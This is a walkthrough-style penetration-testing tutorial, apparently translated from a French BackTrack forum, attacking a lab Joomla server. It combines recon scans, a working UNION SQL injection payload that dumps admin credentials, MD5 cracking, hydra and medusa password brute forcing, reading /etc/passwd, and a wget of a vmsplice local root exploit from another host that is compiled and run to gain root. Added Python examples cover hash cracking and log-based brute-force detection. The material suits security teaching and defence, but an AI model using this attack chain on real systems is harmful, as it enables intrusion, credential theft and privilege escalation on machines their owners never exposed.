This tutorial's only purpose is to show that a badly configured system is vulnerable.

We will start by using a few tools to collect information about the server we are targeting:
- httprint
- dmitry http://wiki.backtrack-fr.net/index.php/DMitry
- nmap http://wiki.backtrack-fr.net/index.php/Nmap
- amap http://wiki.backtrack-fr.net/index.php/Amap
Code:
bt linux # httprint -h 192.168.1.44 -s signatures.txt
httprint v0.301 (beta) - web server fingerprinting tool
(c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/
[email protected]

Finger Printing on http://192.168.1.44:80/
Finger Printing Completed on http://192.168.1.44:80/
--------------------------------------------------
Host: 192.168.1.44
Derived Signature:
Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
811C9DC568D17AAE811C9DC5811C9DC5811C9DC5505FCFE84276E4BB630A04DB
0D7645B5811C9DC5811C9DC5CD37187C811C9DC5811C9DC5811C9DC5811C9DC5
68D17AAE68D17AAE68D17AAE811C9DC5E2CE6927050C5D3368D17AAE9E431BC8
6ED3C29568D17AAE2A200B4C68D17AAE68D17AAE68D17AAE68D17AAEE2CE6923
E2CE692368D17AAE811C9DC5E2CE6927E2CE6923

Banner Reported: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
Banner Deduced: Lotus-Domino/6.x
Score: 92
Confidence: 55.42
------------------------
Code:
bt ~ # dmitry -p -b 192.168.1.44
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:192.168.1.44
HostName:joomla12

Gathered TCP Port information for 192.168.1.44
---------------------------------

 Port		State

21/tcp		open
>> 220 Welc0m3 To The SUp3r S3cuRe's Ftp S3rVer
22/tcp		open
>> SSH-2.0-OpenSSH_4.3p2 Debian-9
80/tcp		open
.....
Code:
bt bin # amap -bvq 192.168.1.44 80
Using trigger file /usr/local/etc/appdefs.trig ... loaded 30 triggers
Using response file /usr/local/etc/appdefs.resp ... loaded 346 responses
Using trigger file /usr/local/etc/appdefs.rpc ... loaded 450 triggers
amap v5.2 (www.thc.org/thc-amap) started at 2008-09-15 17:35:02 - MAPPING mode

Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 192.168.1.44:80/tcp (by trigger http) matches http - banner: HTTP/1.1 302 Found\r\nDate: Mon, 15 Sep 2008 17:28:21 GMT\r\nServer: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8\r\nLocation: http://127.0.1.1/apache2-default/\r\nContent-Length: 368\r\nConnection: close\r\n
....
amap v5.2 finished at 2008-09-15 17:35:11
Code:
bt ~ # nmap -sSV -P0 192.168.1.44

Starting Nmap 4.50 ( http://insecure.org ) at 2008-09-15 17:44 CEST
Interesting ports on joomla12 (192.168.1.44):
Not shown: 1706 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd or WU-FTPD
22/tcp  open  ssh     OpenSSH 4.3p2 Debian 9 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.2.3 ((Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8)
111/tcp open  rpcbind 2 (rpc #100000)
113/tcp open  ident   OpenBSD identd
MAC Address: 00:02:A5:23:CE:94 (Compaq Computer)
Service Info: OSs: Linux, OpenBSD

Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.378 seconds
From this information gathering we see an Apache 2.2.3 web server on a Debian etch machine, an FTP service (vsftpd or WU-FTPD) and an OpenSSH 4.3p2 service; nmap also shows rpcbind (111/tcp) and ident (113/tcp). Two things to keep in mind when reading these results: the FTP banner has been customised ("Welc0m3 To The SUp3r S3cuRe's Ftp S3rVer"), which is why nmap cannot decide between vsftpd and WU-FTPD, and httprint's deduced fingerprint (Lotus-Domino/6.x at 55% confidence) contradicts the banner reported by every other tool, so here we trust the banner and treat the fingerprint as noise, most likely from signatures that predate Apache 2.2.
We will now test the web site running on this machine with nikto.
- nikto http://wiki.backtrack-fr.net/index.php/Nikto
Code:
bt nikto # ./nikto.pl -e 1 -host http://192.168.1.44/joomla12 -F txt -o nickojoom.txt
---------------------------------------------------------------------------
- Nikto 2.01/2.01     -     cirt.net
+ Target IP:       192.168.1.44
+ Target Hostname: joomla12
+ Target Port:     80
+ Using IDS Evasion: Random URI encoding (non-UTF8)
+ Start Time:      2008-09-16 10:26:17
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
+ No CGI Directories found (use '-C all' to force check all possible dirs)
- Root page / redirects to: http://joomla12/apache2-default/
- Retrieved X-Powered-By header: PHP/5.2.0-8+etch10
+ /robots.txt - contains 13 'disallow' entries which should be manually viewed (added to mutation file lists) (GET).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.6). Apache 1.3.39 and 2.0.61 are also current.
+ mod_python/3.2.10 appears to be outdated (current is at least 3.3.1)
+ PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
+ mod_perl/2.0.2 appears to be outdated (current is at least 5.8.0)
+ OSVDB-0: GET /joomla12/help/ : Help directory should not be accessible
+ OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
+ OSVDB-8193: GET /joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc : EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-12184: GET /joomla12/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3092: GET /joomla12/administrator/ : This might be interesting...
+ OSVDB-3092: GET /joomla12/includes/ : This might be interesting...
+ OSVDB-3093: GET /joomla12/index.php?base=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?IDAdmin=test : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?pymembs=admin : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?SqlQuery=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?tampon=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?topic=<script>alert(document
+ OSVDB-3761: GET /joomla12/?pattern=/etc/*&sort=name : The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.
+ 2963 items checked: 22 item(s) reported on remote host
+ End Time:        2008-09-16 10:27:08 (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The report tells us there may be vulnerabilities. It's up to us to test them and see which ones are real :P
Code:
+ OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
We start with this one. Taken literally it is a false positive: My_eGallery belongs to the PostNuke family of CMSs, not to Joomla, and nikto flagged the URL only because Joomla's index.php answers any unknown query string with its normal page and a 200 status (the EW FileManager and TCLHttpd hits in the same report have the same cause). What the hit does tell us is to look at the third-party components this Joomla install runs. Browsing the site, we find the component in use is MyAlbum:
(hxxp://192.168.1.44/joomla12/index.php?option=com_myalbum&Itemid=26)
A quick search on milw0rm will tell us whether an exploit exists for it.
Code:
bt Desktop # ./milwormsearch.sh Joomla myalbum
************************************************
* Explorateur d'exploit sur Milw0rm *
* by s3th *
************************************************
exploit: Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability
Link : http://www.milw0rm.com/exploits/5318
Voulez-vous afficher l'exploit dans firefox (F) ou à l'écran (E) ou quitter (Q) :
e
<html><head><title>Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability</title></head><pre>-------------------------------------------------------------------------------------------------
# Title : Joomla Component MyAlbum SQL Injection Vulnerability
# Author : parad0x
# D.Page : http://joomlacode.org/gf/project/myalbum/
-------------------------------------------------------------------------------------------------
http://[target]/index.php?option=com_myalbum&album=[SQL]
-------------------------------------------------------------------------------------------------
Example:
http://www.akparti.org.tr/disiliskil...%20jos_users/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------
http://inso.spam-site.www
# milw0rm.com [2008-03-28]</pre></html>
So we test this injection on our site: -1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*
The album id -1 matches no real album, the UNION SELECT supplies five values to match the five columns of the component's own query, concat(username,char(32),password) puts "username password" in the column the page displays as an album title, and the trailing /* comments out whatever follows in the original query.
Code:
http://192.168.1.44/joomla12/index.p...%20jos_users/*
and find the admin password, stored as an MD5 hash:
admin e10adc3949ba59abbe56e057f20f883e
Now we will see why choosing a good password matters: if the password is weak it will be broken by a tool like John the Ripper, or it will already be in an online cracking database.
- johntheripper http://wiki.backtrack-fr.net/index.php/John_The_Ripper
Code:
bt Desktop # ./md5crack.sh e10adc3949ba59abbe56e057f20f883e
************************************************
* MD5crack online *
* by s3th *
************************************************
Plain text: 123456
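What md5crack.sh, John the Ripper and the online lookup databases actually do with the recovered hash, plus why a salt changes the picture. This is an added example, not the tutorial's script or john's code. Only the hash e10adc3949ba59abbe56e057f20f883e comes from the page; the wordlist is a constructed stand-in for a real one, and the `md5(password+salt):salt` storage format is the one Joomla 1.5 introduced, not what this target uses (it stores a bare MD5).

```python
"""Added example (not from the tutorial): dictionary attack on the admin
hash, a precomputed lookup table, and the same attack against a salted hash.

Only ADMIN_HASH is from the page; WORDLIST and the salt are constructed.
"""
import hashlib

ADMIN_HASH = "e10adc3949ba59abbe56e057f20f883e"   # from the page: admin's unsalted MD5
WORDLIST = ["password", "qwerty", "1234", "123456", "letmein", "s3th2008"]  # constructed


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def crack_unsalted(target, words):
    """Dictionary attack: hash each candidate and compare. This is what john
    does, at millions of candidates per second for raw MD5."""
    for word in words:
        if md5_hex(word) == target:
            return word
    return None


def lookup_table(words):
    """An online 'MD5 crack' database is this dict built once over a huge
    wordlist: the unsalted hash is the lookup key, so one table serves every
    site that stores bare MD5s."""
    return {md5_hex(word): word for word in words}


def salted_hash(password, salt):
    """Joomla 1.5 style storage: md5(password + salt):salt."""
    return md5_hex(password + salt) + ":" + salt


def crack_salted(stored, words):
    """Same dictionary attack against a salted hash. The salt is stored in
    clear, so a weak password still falls, but each hash now costs its own
    run and no precomputed table applies."""
    digest, salt = stored.split(":", 1)
    for word in words:
        if md5_hex(word + salt) == digest:
            return word
    return None
```

The lesson the tutorial draws still holds with a salt: "123456" is found on the fourth guess either way. What the salt buys is that the site's hashes cannot be looked up in a shared table, which is exactly how md5crack.sh got its answer above.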
Now that we can log in to the site as admin, all that is left is to upload a script that lets us run shell commands, or a backdoor, and look for interesting information on the server. Two obvious first commands: /etc/passwd for the local accounts (s3th and ftpuser are the ones with a real login shell) and uname -a for the kernel version.
cat /etc/passwd
Code:
s3th:x:1000:1000:s3th,,,:/home/s3th:/bin/bash
mysql:x:109:114:MySQL Server,,,:/var/lib/mysql:/bin/false
ftp:x:110:65534::/home/ftp:/bin/false
ftpuser:x:1001:1001::/home/ftpuser:/bin/bash
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
snort:x:112:115:Snort IDS:/var/log/snort:/bin/false
uname -a
Code:
Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
Now that we have a user "s3th", we can attack the FTP or SSH service with:
- hydra http://wiki.backtrack-fr.net/index.php/Hydra/Hydra-gtk
- medusa
Code:
bt Desktop # hydra -l s3th -P ../arbeit/dict 192.168.1.44 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2008-09-17 11:21:39
[DATA] 16 tasks, 1 servers, 30206 login tries (l:1/p:30206), ~1887 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.44 login: s3th password: 123456
[STATUS] attack finished for 192.168.1.44 (waiting for childs to finish)
[21][ftp] host: 192.168.1.44 login: s3th password: 123456
Hydra (http://www.thc.org) finished at 2008-09-17 11:21:46
Code:
bt Desktop # medusa -h 192.168.1.44 -u s3th -P ../arbeit/dict -M ssh
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 1234 (1/30206)
ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 123456 (2/30206)
ACCOUNT FOUND: [ssh] Host: 192.168.1.44 User: s3th Password: 123456 [SUCCESS]
Now that we have an SSH account and password, all that is left is to log in:
Code:
bt ~ # ssh s3th@192.168.1.44
s3th@192.168.1.44's password:
Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Sep 15 11:28:45 2008
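The defender's side of the hydra and medusa runs above. Each run leaves a burst of failed logins from one client in /var/log/vsftpd.log (FTP) and /var/log/auth.log (sshd), followed by a single success. This is an added example, not part of the tutorial. The log lines are constructed to mirror what those runs would have written on the target; the attacker address 192.168.1.39 is assumed from the host that serves the exploit later in the tutorial, the second client 192.168.1.10 is invented as a legitimate user, and the threshold and window values are assumptions.

```python
"""Added example (not from the tutorial): detect a successful brute force in
vsftpd and sshd logs. The sample lines are constructed; the client
addresses, thresholds and the syslog year are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

VSFTPD_LOG = """\
Wed Sep 17 11:21:39 2008 [pid 2101] CONNECT: Client "192.168.1.39"
Wed Sep 17 11:21:39 2008 [pid 2100] [s3th] FAIL LOGIN: Client "192.168.1.39"
Wed Sep 17 11:21:40 2008 [pid 2102] [s3th] FAIL LOGIN: Client "192.168.1.39"
Wed Sep 17 11:21:40 2008 [pid 2104] [s3th] FAIL LOGIN: Client "192.168.1.39"
Wed Sep 17 11:21:41 2008 [pid 2106] [s3th] FAIL LOGIN: Client "192.168.1.39"
Wed Sep 17 11:21:42 2008 [pid 2108] [s3th] FAIL LOGIN: Client "192.168.1.39"
Wed Sep 17 11:21:43 2008 [pid 2110] [s3th] FAIL LOGIN: Client "192.168.1.39"
Wed Sep 17 11:21:44 2008 [pid 2112] [s3th] OK LOGIN: Client "192.168.1.39"
Wed Sep 17 11:40:02 2008 [pid 2200] [ftpuser] OK LOGIN: Client "192.168.1.10"
"""

AUTH_LOG = """\
Sep 17 12:05:11 debian sshd[2350]: Failed password for s3th from 192.168.1.39 port 40112 ssh2
Sep 17 12:05:12 debian sshd[2352]: Accepted password for s3th from 192.168.1.39 port 40114 ssh2
Sep 17 12:30:45 debian sshd[2400]: Accepted password for s3th from 192.168.1.10 port 51022 ssh2
"""

# vsftpd's own log format and sshd's password-auth lines as written to syslog.
VSFTPD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<res>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')
SSHD_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<res>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<ip>\S+) port \d+')
SYSLOG_YEAR = 2008  # syslog lines carry no year; assumed from the page's dates


def parse_vsftpd(text):
    events = []
    for line in text.splitlines():
        m = VSFTPD_RE.match(line)
        if not m:
            continue  # CONNECT and transfer lines are not login attempts
        events.append({"ts": datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"),
                       "service": "ftp", "user": m["user"], "ip": m["ip"],
                       "ok": m["res"] == "OK"})
    return events


def parse_sshd(text):
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=SYSLOG_YEAR)
        events.append({"ts": ts, "service": "ssh", "user": m["user"], "ip": m["ip"],
                       "ok": m["res"] == "Accepted"})
    return events


def detect(events, threshold=5, window=60):
    """Return alerts as (kind, service, ip, user, failures).
    (a) bruteforce-success: a success preceded by >= threshold failures from
        the same client on the same service within `window` seconds.
    (b) success-from-flagged-client: a success on another service from a
        client already flagged under (a). The medusa run above guessed the
        password on its second try, so (a) alone would miss the SSH login."""
    alerts = []
    per_key = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        per_key[(ev["service"], ev["ip"])].append(ev)
    flagged_ips = set()
    for (service, ip), evs in per_key.items():
        fails = []
        for ev in evs:
            if not ev["ok"]:
                fails.append(ev["ts"])
                continue
            recent = [t for t in fails if (ev["ts"] - t).total_seconds() <= window]
            if len(recent) >= threshold:
                alerts.append(("bruteforce-success", service, ip, ev["user"], len(recent)))
                flagged_ips.add(ip)
            fails = []
    for (service, ip), evs in per_key.items():
        if ip in flagged_ips and not any(a[1] == service and a[2] == ip for a in alerts):
            for ev in evs:
                if ev["ok"]:
                    alerts.append(("success-from-flagged-client", service, ip, ev["user"], 0))
                    break
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_vsftpd(VSFTPD_LOG) + parse_sshd(AUTH_LOG)):
        print(alert)
```

Run on the two constructed logs this yields exactly two alerts: the FTP login from 192.168.1.39 after six failures, and the later SSH login from the same client, which is only caught because the FTP alert flagged that address first. The legitimate logins from 192.168.1.10 raise nothing.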
There we are; all that's left is to find a little exploit. uname -a gave us a 2.6.18-4-686 kernel built in March 2007, which predates the fix for the 2008 vmsplice local root flaw, so the public vmsplice exploit is the natural candidate.
Code:
s3th@debian:~$ whoami
s3th
s3th@debian:~$ cd /tmp/
s3th@debian:/tmp$ wget 192.168.1.39/vmsplice-local-root-exploit.c
--13:21:50--  http://192.168.1.39/vmsplice-local-root-exploit.c
           => `vmsplice-local-root-exploit.c'
Connecting to 192.168.1.39:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,293 (6.1K) [text/x-c]

100%[=============================================================================================>] 6,293         --.--K/s

13:22:42 (198.77 KB/s) - `vmsplice-local-root-exploit.c' saved [6293/6293]

s3th@debian:/tmp$ gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
s3th@debian:/tmp$ ./vmsplice-local-root-exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e32000 .. 0xb7e64000
[+] root
root@debian:/tmp# whoami
root
Do not try these techniques on machines that do not belong to you.
Everything you do will be logged on the machine.
src:bt-fr.net